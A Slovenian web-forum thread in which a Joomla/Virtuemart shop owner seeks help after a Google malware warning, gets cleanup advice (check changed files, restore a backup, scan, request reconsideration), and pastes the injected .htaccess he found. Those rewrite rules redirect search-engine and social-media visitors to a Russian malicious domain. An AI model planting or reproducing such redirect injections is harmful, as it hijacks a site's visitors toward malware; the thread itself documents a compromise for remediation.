Malware notification · Internet Mojster

474263163

31. jul 2012 ob 09:21

Pozdravljeni,

žena je dobila danes zjutraj obvestilo od Googla o zlonamerni kodi v spletni trgovini.

Par dni nazaj je dobila, preko obrazca v spletni trgovini, tako povpraševanje:

jxxufzr has requested more information on...
Question

UF5jW3 kohegynwoygc, tamdarwrxiix, [link=http://lzmujaerkjsg.com/]lzmujaerkjsg[/link], http://ozefjvzrqbqy.com/
jxxufzr, ymqeqv@kbouun.com

Od tu naprej mislim, da je šlo vse narobe...

Bi lahko kdo priskočil na pomoč in pomagal odpravit to zadevo? Kaj naj sploh naredim? Kontaktirat gostovanje? Če ima kdo čas in bi rad zadevo odpravil, mi lahko pošlje tudi ponudbo.

Še par tehničnih podatkov na čem stoji trgovina:
Joomla: 1.5.15
Virtuemart: 1.1.3

V roku meseca, dveh je predviden prehod na Opencart in zato nismo nič updejtali sedanje administracije, saj je vse laufalo... :/ Zdaj pa...

lp,
Daniel

2486

joomla spletni strežniki opencart

denis

103346011930

31. jul 2012 ob 09:53

Captcha is your friend. Ali pa raje vprašanje: Koliko je 2 + 2 ?

3

Preseren

3875232733898

31. jul 2012 ob 10:24

nessuno, po moje to povpraševanje ni nič povezano.
Odpri ftp, in pejdi pogledat katere datoteke so bile v zadnjih par dneh spremenjene. htaccess, index.html, index.php so ponavadi spremenjene in imajo nekaj čudnega noter. Če je mogoče, enostavno naloži stari backup, če imaš recimo hostgator gostovanje, ti lahko to oni naredijo. Mislim pa da zdaj celo računajo nek fee da ti to naredijo. ČE praviš da niste veliko spreminjali na trgovini je to opcija. Seveda pa to potem pomein, da se ti to lahko ponovi.
Opcija je tudi, da celo stran s ftp pobereš dol in jo poskeniraš z antivirusom.
Potem pa je treba z Googlom uredit, če imaš stran označeno kot stran z zlonamerno kodo, potem ne boš dobival skoraj nič obiskovalcev iz iskalnikov. Če se prav spomnim iz glave, obstaja nek reconsideration request tudi za to.
Poleg tega odpri stran in poglej soruce, če vidiš kaj čudnega noter.

2

nessuno

474263163

31. jul 2012 ob 11:24

Gostovanje je v Sloveniji. Zaenkrat sem naredil lokalni backup in preskeniral fajle in našel 2 okužena in ju odstranil.

.htaccess je tudi fu*** up:

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTPREFERER} ^.(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace).(.)
RewriteRule ^(.*)$ http://moisupas.ru/blackmuscats?5 [R=301,L]
RewriteCond %{HTTPREFERER} ^.(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.)
RewriteRule ^(.*)$ http://moisupas.ru/blackmuscats?5 [R=301,L]
</IfModule>

Kaj naj zdaj naredim?